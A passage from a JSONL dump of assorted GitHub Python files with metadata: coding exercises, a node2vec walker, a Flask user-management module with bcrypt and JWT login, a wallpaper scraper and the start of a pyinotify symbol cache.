os.path.samefile(entry, os.path.abspath(sys.path[0]))\n ):\n sys.path.insert(0, entry)\n addpath.insert(0, entry)\n if addpath:\n if 'PYTHONPATH' in os.environ:\n addpath.append(os.environ['PYTHONPATH'])\n os.environ['PYTHONPATH'] = os.pathsep.join(addpath)\n\n genkey = True\n i = 1\n while i < len(sys.argv):\n arg = sys.argv[i]\n if arg.lower() == '--nokey':\n genkey = False\n sys.argv.pop(i)\n elif arg == '--':\n break\n i += 1\n\n if genkey and not 'DJANGO_SECRET_KEY' in os.environ:\n import string\n os.environ['DJANGO_SECRET_KEY'] = ''.join(\n [ random.SystemRandom().choice(\n \"{}{}{}\".format(string.ascii_letters, string.digits, string.punctuation))\n for i in range(63)\n ])\n\n utility.execute()\n","repo_name":"StanLivitski/cards.webapp","sub_path":"web.src/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":7227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"40263685835","text":"#Print addition of prime numbers between 50 to 100.\n\nbrr=[]\nsum=0\nfor i in range(50,101):\n brr.append(i)\n\nfor i in brr:\n if i > 1:\n for j in range(2, i):\n if (i % j) == 0:\n break\n else:\n sum=sum+i\n \n \nprint(\"Sum is \",sum)\n","repo_name":"Chandan4862/pythonBackup","sub_path":"trainingSession/workspace/test/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29508608530","text":"\"\"\"\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\n\n\nExample 1:\n\nInput: strs = [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\n\nInput: strs = [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\n\n\nConstraints:\n\n0 <= strs.length <= 200\n0 <= strs[i].length <= 200\nstrs[i] consists of only lower-case English letters.\n\"\"\"\n\n\nclass Solution(object):\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if len(strs) == 0:\n return \"\"\n lcp_string = \"\"\n strs_min = min(strs)\n strs_max = max(strs)\n for x in range(len(strs_min)):\n if strs_min[x] == strs_max[x]:\n lcp_string += strs_min[x]\n else:\n break\n return lcp_string\n\n\nmy_string = [\"dog\", \"racecar\", \"car\"]\nsolution = Solution()\nprint(solution.longestCommonPrefix(my_string))\n","repo_name":"skyheat47295/LeetCode_Problems_Python","sub_path":"Longest_Common_Prefix.py","file_name":"Longest_Common_Prefix.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32629306948","text":"\"\"\"\n\" File Description:\n\" Given a binary search tree, write a function kthSmallest to find the kth smallest element in it.\n\"\n\" Created by Rocha(chenzhihao) on 2020/12/30.\n\" Mail: chenzh@wifi.com\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n\tdef __init__(self, val=0, left=None, right=None):\n\t\tself.val = val\n\t\tself.left = left\n\t\tself.right = right\n\n\nclass Solution(object):\n\tdef kthSmallest(self, root, k):\n\t\t\"\"\"\n\t\t:type root: TreeNode\n\t\t:type k: int\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tst = []\n\t\tcur = root\n\n\t\twhile st or cur:\n\t\t\tif cur:\n\t\t\t\tst.append(cur)\n\t\t\t\tcur = cur.left\n\t\t\telse:\n\t\t\t\tcur = st.pop()\n\t\t\t\tk -= 1\n\n\t\t\t\tif k == 
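The min/max trick in the longest-common-prefix record above works because the lexicographic minimum and maximum bound every other string: any prefix those two share is shared by all. An equivalent column-wise version that stops at the first disagreeing position (the standard library's os.path.commonprefix does the same job):

def lcp(strs):
    prefix = []
    for chars in zip(*strs):          # zip stops at the shortest string
        if len(set(chars)) != 1:      # more than one letter in this column
            break
        prefix.append(chars[0])
    return "".join(prefix)

print(lcp(["flower", "flow", "flight"]))   # fl
print(lcp(["dog", "racecar", "car"]))      # (empty string)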
0:\n\t\t\t\t\treturn cur.val\n\n\t\t\t\tcur = cur.right\n\n\n\n\n\n\n\n\n","repo_name":"RochaC/leetcode_play","sub_path":"230_Kth_Smallest_Element_in_a_BST.py","file_name":"230_Kth_Smallest_Element_in_a_BST.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31625735294","text":"import utils\r\n\r\nfrom units.unit import Unit\r\nfrom synergies import Sentinel\r\nfrom synergies import Cannoneer\r\nfrom projectile import Projectile\r\n\r\nclass LastEmbrace(Projectile):\r\n def on_unit_hit(self, time, unit):\r\n if unit.team == self.owner.team:\r\n return\r\n\r\n self.owner.deal_magic_damage(unit, self.owner.get_last_embrace_damage())\r\n unit.stun(time, self.owner.get_last_embrace_stun_duration())\r\n for u in self.map.units:\r\n if u.team != unit.team:\r\n continue\r\n if u.distance(unit.row, unit.col) <= 1:\r\n self.owner.deal_magic_damage(u, self.owner.get_last_embrace_damage())\r\n self.destroyed = True\r\n\r\n\r\nclass Senna(Unit):\r\n def __init__(self, **kwargs):\r\n super().__init__(\r\n cost=1,\r\n health=500,\r\n starting_mana=40,\r\n total_mana=80,\r\n armor=15,\r\n magic_resist=15,\r\n attack_damage=55,\r\n attack_speed=0.7,\r\n attack_range=4,\r\n image_name='senna',\r\n synergies=[Sentinel, Cannoneer],\r\n **kwargs,\r\n )\r\n self.cast_time = 0.2\r\n\r\n def get_last_embrace_damage(self):\r\n base_damage = {\r\n 1: 200,\r\n 2: 300,\r\n 3: 450\r\n }[max(1, self.star_level)]\r\n return base_damage * self.get_spell_power() / 100\r\n\r\n def get_last_embrace_stun_duration(self):\r\n return 1.5\r\n\r\n def perform_spell(self, map, time):\r\n target = self.farthest_hex_enemy(map)\r\n if not target:\r\n return\r\n\r\n x0, y0 = utils.xy_pos_from_ij_tile(self.row, self.col)\r\n xE, yE = utils.xy_pos_from_ij_tile(target.row, target.col)\r\n\r\n map.projectiles.append(\r\n LastEmbrace(\r\n map=map,\r\n owner=self,\r\n time=time,\r\n x0=x0,\r\n y0=y0,\r\n xE=xE,\r\n yE=yE,\r\n radius=20,\r\n hex_per_second=7,\r\n )\r\n )\r\n","repo_name":"aboubacs/tft-units","sub_path":"senna.py","file_name":"senna.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29681317217","text":"from binarytree import build\n\n\ndef sample_tree_1():\n values = [7, 3, 2, 6, 9, None, 1, 5, 8]\n tree = build(values)\n return tree\n\n\ndef main():\n tree = sample_tree_1()\n print(tree)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maddmaster/algos","sub_path":"python/breadth_first_search_old/btrees/base2.py","file_name":"base2.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14364782615","text":"def check_Prime(data):\n for i in range(1,int(len(data)//2)+1):\n #extract subword from first letter , loop until half of word length \n key=words[0:i]\n #count exist times of key in word\n count=words.count(key)\n if len(key)*count == len(words):\n return 'not prime'\n break\n return 'prime'\nwords=input('string: ').strip()\nprint(check_Prime(words))","repo_name":"phat-code-hub/Public-Code","sub_path":"SoloLearn/Prime String.py","file_name":"Prime String.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"25282365506","text":"import itertools\nimport math\nimport random\nimport numpy as np\nimport pandas 
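In the Prime String record above, `check_Prime(data)` immediately ignores its parameter and reads the global `words`, so it only behaves when called from that script's own main flow. A self-contained version of the same periodicity test, with an explicit `key * count` comparison added so that non-contiguous occurrences cannot produce a false positive:

def check_prime(word):
    # 'not prime' means the word is some block repeated two or more times.
    for i in range(1, len(word) // 2 + 1):
        key = word[:i]
        count = word.count(key)
        if len(key) * count == len(word) and word == key * count:
            return "not prime"
    return "prime"

print(check_prime("abab"))    # not prime ('ab' * 2)
print(check_prime("ababa"))   # prime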
as pd\nfrom joblib import Parallel, delayed\nfrom tqdm import trange\nfrom alias import alias_sample, create_alias_table\nfrom utils import partition_num\n\nclass RandomWalker():\n def __init__(self,G,p,q):\n self.G = G\n self.p = p\n self.q = q\n\n def preprocessing_transition_probs(self):\n G = self.G\n alias_nodes = {}\n alias_edges = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbs].get('weight',1.0) for nbs in G.neighbors(node)]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [float(un_prob/norm_const) for un_prob in unnormalized_probs]\n alias_nodes[node] = create_alias_table(normalized_probs)\n\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0],edge[1])\n \n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n \n def get_alias_edge(self,pre_node,_node):\n G = self.G\n p = self.p \n q = self.q \n unnormalized_probs = []\n for nbs in G.neighbors(_node):\n weight = G[_node][nbs].get('weight', 1.0)\n if nbs == pre_node:\n unnormalized_probs.append(weight/p)\n elif G.has_edge(pre_node,nbs):\n unnormalized_probs.append(weight)\n else:unnormalized_probs.append(weight/q)\n norm_const = sum(unnormalized_probs)\n normalized_probs = [float(un_probs/norm_const) for un_probs in unnormalized_probs]\n\n return create_alias_table(normalized_probs)\n \n def node2vec_walk(self,walk_length,start_node):\n G = self.G \n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk)<walk_length:\n cur = walk[-1]\n cur_nbrs = list(G.neighbors(cur))\n if len(cur_nbrs)>0:\n if len(walk)==1:\n walk.append(\n cur_nbrs[alias_sample(alias_nodes[cur][0], alias_nodes[cur][1])])\n else:\n prev = walk[-2]\n edge = (prev,cur)\n next_node = cur_nbrs[alias_sample(alias_edges[edge][0],alias_edges[edge][1])]\n walk.append(next_node)\n else: break\n \n return walk \n\n def _parallel_walk(self,nodes,num_walk,walk_length):\n G = self.G\n # nodes = G.nodes()\n walks = []\n for _ in range(num_walk):\n random.shuffle(nodes)\n for _n in nodes:\n walks.append(self.node2vec_walk(walk_length,_n))\n return walks\n\n def parallel_walks(self, num_walks, walk_length, workers=1, verbose=0):\n G = self.G\n nodes = list(G.nodes())\n results = Parallel(n_jobs=workers, verbose=verbose, )(\n delayed(self._parallel_walk)(nodes,num, walk_length) for num in\n partition_num(num_walks, workers))\n walks = list(itertools.chain(*results))\n return walks\n\n","repo_name":"gaudelbijay/node2vec","sub_path":"code/walker.py","file_name":"walker.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31001617716","text":"\"\"\"\r\n백준 4485번 녹색 옷 입은 애가 젤다지?\r\n\r\n1. 아이디어\r\n- 다익스트라로 모든 점에 대하여 거리를 잰다\r\n\r\n2. 시간복잡도\r\n- VlogE = N*N log 4N*N = 125*125 log 4 * 125*125\r\n\r\n3. 
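walker.py above imports `create_alias_table` and `alias_sample` from a local `alias` module that the record does not include. For reference, a standard Vose alias-method pair with the same call shape; this sketches what such helpers typically do and is not the repo's actual module.

import random

def create_alias_table(probs):
    # O(n) preprocessing for O(1) sampling from a discrete distribution.
    n = len(probs)
    accept, alias = [0.0] * n, [0] * n
    scaled = [p * n for p in probs]
    small = [i for i, p in enumerate(scaled) if p < 1.0]
    large = [i for i, p in enumerate(scaled) if p >= 1.0]
    while small and large:
        s, l = small.pop(), large.pop()
        accept[s], alias[s] = scaled[s], l
        scaled[l] -= 1.0 - scaled[s]          # donate mass to the small bucket
        (small if scaled[l] < 1.0 else large).append(l)
    for i in small + large:
        accept[i] = 1.0
    return accept, alias

def alias_sample(accept, alias):
    i = random.randrange(len(accept))
    return i if random.random() < accept[i] else alias[i]

accept, alias = create_alias_table([0.5, 0.3, 0.2])
counts = [0, 0, 0]
for _ in range(100000):
    counts[alias_sample(accept, alias)] += 1
print([c / 100000 for c in counts])   # roughly [0.5, 0.3, 0.2]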
자료구조\r\n- edges = int[N][N]\r\n- dist = int[N][N]\r\n- heap\r\n\r\n\r\n\"\"\"\r\nimport sys, heapq\r\nINF = sys.maxsize\r\ninput = sys.stdin.readline\r\n\r\n\r\n\r\n\r\ndef main(N):\r\n edges = [ list(map(int, input().split())) for _ in range(N) ]\r\n dist = [[INF] * N for _ in range(N)]\r\n dist[0][0] = edges[0][0]\r\n heap = [[dist[0][0], 0, 0]]\r\n\r\n dy = [1, 0, -1, 0]\r\n dx = [0, 1, 0, -1]\r\n while heap:\r\n w, y, x = heapq.heappop(heap)\r\n if w != dist[y][x]:\r\n continue\r\n\r\n for d in range(4):\r\n ey = y + dy[d]\r\n ex = x + dx[d]\r\n\r\n if 0<=ey<N and 0<=ex<N:\r\n if dist[ey][ex] > w + edges[ey][ex]:\r\n dist[ey][ex] = w + edges[ey][ex]\r\n heapq.heappush(heap, [dist[ey][ex], ey, ex])\r\n\r\n print(\"Problem {}: {}\".format(cnt, dist[N-1][N-1]))\r\n\r\ncnt = 1\r\nwhile True:\r\n N = int(input())\r\n if N == 0:\r\n break\r\n else:\r\n main(N)\r\n cnt += 1\r\n","repo_name":"compasstar/coding-test","sub_path":"Dijkstra's/baekjoon4485.py","file_name":"baekjoon4485.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72078350700","text":"import abc\nimport contextlib\nimport os\nimport pathlib\nimport subprocess\n\n@contextlib.contextmanager\ndef cd(new_dir):\n cwd = os.getcwd()\n os.chdir(new_dir)\n yield\n os.chdir(cwd)\n\n\nclass AbstractWrapper(object):\n def __init__(self, name, config):\n self.name = name\n self.config = config\n self.results = []\n\n def get_results(self):\n return self.results\n\n @abc.abstractmethod\n def run_command(self, input_directory):\n pass\n\n def change_directory(self):\n return None\n\n def pre_analyze(self, inp):\n if not os.path.exists(os.path.join(self.config.results_dir, self.name)):\n os.makedirs(os.path.join(self.config.results_dir, self.name))\n\n def post_analyze(self, inp):\n pass\n\n def run(self, input_directory):\n new_dir = os.getcwd()\n if self.change_directory():\n new_dir = self.change_directory()\n inputs = [input_directory]\n if self.config.individual_files:\n inputs = pathlib.Path(input_directory).glob('*.%s' % self.config.file_ext)\n inputs = [str(i) for i in list(inputs)]\n with cd(new_dir):\n status = 0\n for inp in inputs:\n self.pre_analyze(inp)\n try:\n co = subprocess.run(self.run_command(str(inp)), check=True, shell=True)\n status = status | co.returncode\n self.post_analyze(inp)\n except Exception as ex:\n print(ex)\n print(\"Analysis failed!\")\n return status\n","repo_name":"gaborantal/compare-cg","sub_path":"wrappers/abstract_wrapper.py","file_name":"abstract_wrapper.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"75162370860","text":"\n# Import necessary modules\nfrom datetime import datetime, timedelta\nfrom helpers.db_helper import SessionLocal\nfrom models.route_model import UpdateProfile, UserCreate, UserLogin\nimport bcrypt\n\nfrom sqlalchemy import or_\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy import asc, desc \nimport logging\n\nimport jwt\n\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\n\nfrom models.db_model import User\n\n\n# eaxmple of register new user\ndef register(userData: UserCreate, role: str = \"users\"):\n session = SessionLocal()\n try:\n hashed_password = bcrypt.hashpw(userData.password.encode('utf-8'), bcrypt.gensalt()).decode('utf-8')\n\n user = User(fullname=userData.fullname, \n username=userData.username, \n password=hashed_password, \n 
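The `cd` context manager in abstract_wrapper.py above never restores the working directory when the wrapped body raises, because the `yield` is unguarded. A hardened drop-in with the same API:

import contextlib
import os

@contextlib.contextmanager
def cd(new_dir):
    cwd = os.getcwd()
    os.chdir(new_dir)
    try:
        yield
    finally:
        os.chdir(cwd)          # runs even when the body raises

with cd("/tmp"):
    print(os.getcwd())         # /tmp (or its resolved equivalent)
print(os.getcwd())             # back to the original directory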
email=userData.email, \n mobile=userData.mobile, \n role=role,\n agree=1)\n session.add(user)\n session.commit()\n return True, user.id\n except IntegrityError as e:\n # Handle the IntegrityError here\n session.rollback()\n logging.error(f\"Integrity Error: {e}\")\n return False, 'Duplicate username'\n except Exception as e:\n session.rollback()\n logging.error(f\"Exception: {e}\")\n return False, 'Insertion failed'\n\n# example of login user and create login token\ndef login(user: UserLogin):\n session = SessionLocal()\n\n user_record = session.query(User).filter((User.username == user.username) & (User.agree == 1)).first()\n if user_record is not None and bcrypt.checkpw(user.password.encode('utf-8'), user_record.password.encode('utf-8')):\n uDict = user_record.__dict__\n del uDict['password']\n del uDict['_sa_instance_state']\n\n token = jwt.encode({'public_id' : str(uDict['id']), 'exp' : datetime.utcnow() + timedelta(minutes=1440)}, os.getenv('APP_SECRET_KEY'), algorithm=\"HS256\")\n if token is not None:\n uDict['login_token'] = token.decode('utf-8')\n uDict['login_token_date'] = datetime.utcnow()\n res = update_token(uDict['id'], uDict['login_token'], uDict['login_token_date'])\n if res > 0:\n return uDict\n \n return None\n else:\n return None\n \n# example of read user data by user id\ndef getUser(user_id: int):\n try:\n session = SessionLocal()\n\n user_record = session.query(User).filter(User.id == user_id).first()\n uDict = user_record.__dict__\n del uDict['password']\n if 'login_token' in uDict:\n del uDict['login_token']\n if 'login_token_date' in uDict:\n del uDict['login_token_date']\n del uDict['_sa_instance_state']\n return uDict\n except Exception as e:\n logging.error(f\"Exception: {e}\")\n return None\n\n\n# example of read user data by user id and role\ndef validate_user(id: int, role: str = \"users\"):\n try:\n session = SessionLocal()\n\n user_record = session.query(User).filter((User.id == id) & (User.role == role) & (User.agree == 1)).first()\n # add required logic to validate user\n return user_record is not None\n except Exception as e:\n logging.error(f\"Exception: {e}\")\n return False\n\n# function to validate user token\ndef validateUserToken(user_id: int, token: str):\n\n session = SessionLocal()\n user_record = session.query(User).filter(User.id == user_id).first()\n \n if user_record is None:\n return False\n \n if user_record.login_token != token:\n return False\n \n current_time = datetime.utcnow()\n time_difference = current_time - user_record.login_token_date\n\n if time_difference < timedelta(minutes=1440):\n return True\n \n return False\n\n# function to update user login token\ndef update_token(user_id: int, token: str, login_token_date: datetime):\n session = SessionLocal()\n try:\n user_record = session.query(User).filter(User.id == user_id).first()\n if user_record:\n user_record.login_token=token\n user_record.login_token_date=login_token_date\n session.commit()\n return True\n except Exception as e:\n session.rollback()\n logging.error(f\"Exception: {e}\")\n return False\n\n# example of update user details\ndef update_details(userData: UpdateProfile):\n session = SessionLocal()\n try:\n user_record = session.query(User).filter(User.id == userData.profile_id).first()\n if user_record:\n user_record.fullname=userData.fullname, \n user_record.mobile=userData.mobile, \n user_record.agree=userData.status\n session.commit()\n return True, 'User record updated'\n except Exception as e:\n session.rollback()\n logging.error(f\"Exception: {e}\")\n return 
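The `jwt.encode(...).decode('utf-8')` calls above assume PyJWT 1.x, where encode returns bytes; on PyJWT 2.x encode already returns str and `.decode` raises AttributeError. A version-tolerant round trip, with the HS256 algorithm and environment-sourced secret as in the record (the fallback default here is illustrative only):

import os
from datetime import datetime, timedelta, timezone

import jwt  # PyJWT

SECRET = os.environ.get("APP_SECRET_KEY", "dev-only-secret")

def make_token(user_id, minutes=1440):
    payload = {"public_id": str(user_id),
               "exp": datetime.now(timezone.utc) + timedelta(minutes=minutes)}
    token = jwt.encode(payload, SECRET, algorithm="HS256")
    # PyJWT 1.x returns bytes, 2.x returns str: normalize either way.
    return token.decode("utf-8") if isinstance(token, bytes) else token

def read_token(token):
    # Raises jwt.ExpiredSignatureError / jwt.InvalidTokenError on bad input.
    return jwt.decode(token, SECRET, algorithms=["HS256"])

print(read_token(make_token(42))["public_id"])   # 42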
False, 'User record update failed'\n\n# example of list all users with pagination\ndef list_users(role: str, status=\"all\", offset: int = 0, limit: int = 10, order_by: str = None, order_direction: str = None, search_term: str = None):\n session = SessionLocal()\n\n p_res = session.query(User)\n\n if status is not None and status== \"activated\":\n p_res = p_res.filter(User.agree == 1)\n elif status is not None and status== \"deactivated\":\n p_res = p_res.filter(User.agree == 0)\n\n if role is not None and role!= \"all\":\n p_res = p_res.filter(User.role == role)\n\n if search_term:\n like_filter = or_(User.fullname.like(f'%{search_term}%'), User.username.like(f'%{search_term}%'), User.email.like(f'%{search_term}%'), User.mobile.like(f'%{search_term}%'))\n p_res = p_res.filter(like_filter)\n\n total_count = p_res.count()\n\n if order_direction == 'asc':\n p_res = p_res.order_by(asc(order_by))\n else:\n p_res = p_res.order_by(desc(order_by))\n\n p_res = p_res.offset(offset).limit(limit)\n p_res = p_res.all()\n return total_count, [{\"id\": usr.id, \"fullname\": usr.fullname, \"username\": usr.username, \"email\": usr.email, \"mobile\": usr.mobile, \"created_date\": usr.created, \"agree\": usr.agree} for usr in p_res]\n","repo_name":"ntshvicky/Flask-SQLAlchemy-MVC","sub_path":"cruds/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36459598047","text":"import sys\nfrom month import Month\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport concurrent.futures\nfrom selenium import webdriver\nimport requests\nimport re\nimport os\nimport shutil\n\n\ndef RepresentsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n\ndef get_user_input():\n check_user_input(sys.argv[1:])\n return list([int(arg) for arg in sys.argv[1:]]) \n\n\ndef check_user_input(arg):\n current_year = datetime.today().year\n year_list = list(range(current_year,current_year - 22, -1))\n if not arg:\n print(\"Не ввели параметры :(\")\n exit(1)\n elif len(arg) != 2:\n print(\"Не ввели нужное(2) количество параметров :(\")\n exit(1)\n else:\n month, year = list(arg)\n if RepresentsInt(month) and RepresentsInt(year): \n if int(month) in list(map(int, Month)) and int(year) in year_list:\n print(\"Аргументы валидны :)\")\n else:\n print(\"Поменяйте аргументы местами либо сделайте их меньше :(\")\n exit(1)\n else:\n print(\"Ввели не числовой формат :(\")\n exit(1)\n\n\ndef get_urls():\n urls = []\n page = 1\n while True:\n url = f\"https://www.smashingmagazine.com/category/wallpapers/page/{page}/\"\n req = requests.get(url)\n soup = BeautifulSoup(req.text, 'html.parser')\n if soup.find('h2'):\n if soup.find('h2').text == \"Uh-Oh, We Lost Your Page! 
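`list_users` above composes one query incrementally: optional filters, an `or_` of LIKE clauses, a count taken before pagination, dynamic asc/desc ordering, then offset/limit. The same composition pattern against a throwaway in-memory SQLite model; `Person` is a hypothetical stand-in for the record's User, and this Session style needs SQLAlchemy 1.4 or newer.

from sqlalchemy import Column, Integer, String, asc, create_engine, or_
from sqlalchemy.orm import Session, declarative_base

Base = declarative_base()

class Person(Base):
    __tablename__ = "people"
    id = Column(Integer, primary_key=True)
    fullname = Column(String(50))
    email = Column(String(120))

engine = create_engine("sqlite://")    # in-memory, illustration only
Base.metadata.create_all(engine)

with Session(engine) as session:
    session.add_all([Person(fullname=n, email=n.lower() + "@example.org")
                     for n in ("Ada", "Alan", "Grace")])
    session.commit()

    term = "a"
    q = session.query(Person)
    q = q.filter(or_(Person.fullname.like(f"%{term}%"),
                     Person.email.like(f"%{term}%")))   # filters added step by step
    total = q.count()                                   # count before pagination
    page = q.order_by(asc(Person.fullname)).offset(0).limit(10).all()
    print(total, [p.fullname for p in page])            # 3 ['Ada', 'Alan', 'Grace']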
(404) \":\n return urls\n urls.append(url)\n page+=1\n\n\ndef send_req(url):\n op = webdriver.ChromeOptions()\n op.add_argument('headless')\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=op)\n driver.get(url)\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n driver.quit()\n return soup\n\n\ndef get_pages(urls):\n pages = []\n with concurrent.futures.ThreadPoolExecutor() as executor:\n futures = []\n for url in urls:\n futures.append(executor.submit(send_req, url))\n for future in concurrent.futures.as_completed(futures):\n pages.append(future.result())\n return pages\n\n\ndef get_date_urls_from_pages(pages):\n urls = { \"data\":[]}\n\n\n def add_url(url):\n urls[\"data\"].append(url)\n \n \n for page in pages:\n tag_inside = [tag for tag in page.find_all(\"h1\",class_='article--post__title')]\n for tag in tag_inside:\n month_year = tag.find('a').get('href').split(\"-\")\n key = \"-\".join(month_year[-2:]).replace('/', '')\n url = {}\n url[key] = \"https://www.smashingmagazine.com\"+tag.find('a').get('href')\n add_url(url)\n only_date_urls = []\n i = 0\n for item in urls['data']:\n for key in item.keys():\n if any(char.isdigit() for char in key):\n only_date_urls.append(urls['data'][i])\n i+=1\n return only_date_urls\n\n\ndef match_url(date_urls, user_date):\n i=0\n for item in date_urls:\n for date in item.keys():\n if date == user_date:\n print(date_urls[i][date] )\n return date_urls[i][date] \n i+=1\n\n\ndef get_imgs_urls(url):\n if url == None:\n print(\"Нету картинок на эту дату :(\")\n exit(1)\n else:\n soup = send_req(url)\n links = [a['href'] for a in soup.find_all('a', href=re.compile('wallpapers'))]\n return links\n\n\ndef get_month_name(month_num):\n for month in Month:\n if month.value == month_num:\n return month.name\n\n\ndef create_directory(dir_name):\n directory = f\"{os.path.dirname(os.path.realpath(__file__))}\\{dir_name}\"\n if not os.path.isdir(directory):\n os.makedirs(dir_name)\n return directory\n else:\n shutil.rmtree(dir_name)\n os.makedirs(dir_name)\n return directory\n \n\n\ndef extract_single_image(img, dir_path):\n file_name = img.split('/')[-1]\n path = f\"{dir_path}/{file_name}\"\n print(path)\n try:\n r = requests.get(img, stream=True)\n if r.status_code == 200:\n with open(path, 'wb') as f:\n for chunk in r:\n f.write(chunk)\n return \"Completed\"\n except Exception as e:\n return \"Failed\"\n\n\ndef download_imgs(images_urls, dir_path):\n with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\n future_to_url = {executor.submit(extract_single_image, image_url, dir_path) for image_url in images_urls}\n for future in concurrent.futures.as_completed(future_to_url):\n try:\n url = future_to_url[future]\n except Exception as e:\n pass\n try:\n data = future.result()\n print(data)\n except Exception as exc:\n print('%r generated an exception: %s' % (url, exc))\n\n\nif __name__ == \"__main__\":\n urls = get_urls()\n pages = get_pages(urls)\n date_urls = get_date_urls_from_pages(pages)\n month, year = get_user_input()\n user_url = match_url(date_urls, f\"{get_month_name(month)}-{year}\")\n imgs_urls = get_imgs_urls(user_url)\n dir_path = create_directory(f\"{get_month_name(month)}-{year}\")\n download_imgs(imgs_urls, dir_path)\n \n \n\n","repo_name":"VictorSkazetski/cli_test_app","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22519006604","text":"# This Source Code Form 
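`download_imgs` above builds `future_to_url` with a *set* comprehension, so the later `future_to_url[future]` lookup raises TypeError, which the bare except then swallows. The usual pattern keys a dict by future; `download_all` below is a fixed rewrite of that loop with a stand-in `fetch` instead of extract_single_image.

import concurrent.futures

def download_all(urls, fetch):
    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        future_to_url = {executor.submit(fetch, u): u for u in urls}   # dict, not set
        for future in concurrent.futures.as_completed(future_to_url):
            url = future_to_url[future]          # now a valid lookup
            try:
                print(url, "->", future.result())
            except Exception as exc:
                print("%r generated an exception: %s" % (url, exc))

download_all(["a", "b"], fetch=lambda u: u.upper())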
is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport os\nimport sys\nimport tempfile\nfrom ordereddict import OrderedDict\n\nfrom configman import Namespace, RequiredConfig\n\n\nif os.uname()[0] != 'Linux':\n # You're not on Linux! Avoid pyinotify like the plague\n\n warning_message = (\n 'SymbolLRUCache is disabled on operating systems that does not '\n 'have inotify in its kernel.'\n )\n\n class ProcessEvent(object):\n # Defining a class means we can't define the EventHandler class\n # without indenting the whole thing in an if-block.\n def __init__(self, *_, **__):\n # Re-use the warning as a the error message in case someone\n # missing the warning and don't understand why it's not\n # working on their Windows or OSX.\n raise NotImplementedError(warning_message)\n\n # Warn about the fact that SymbolLRUCache is going to be borked\n # just by trying to import this.\n import warnings\n warnings.warn(warning_message)\nelse:\n import pyinotify\n from pyinotify import ProcessEvent\n\n\n# =============================================================================\nclass EventHandler(ProcessEvent):\n # -------------------------------------------------------------------------\n def __init__(self, monitor, verbosity=0):\n pyinotify.ProcessEvent.__init__(self)\n self.monitor = monitor\n self.verbosity = verbosity\n\n # -------------------------------------------------------------------------\n def process_IN_DELETE(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('D')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('D %s', event.pathname)\n self.monitor._remove_cached(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_CREATE(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('C')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('C %s', event.pathname)\n self.monitor._update_cache(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_MOVED_FROM(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('M')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('M> %s', event.pathname)\n self.monitor._remove_cached(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_MOVED_TO(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('M')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('M< 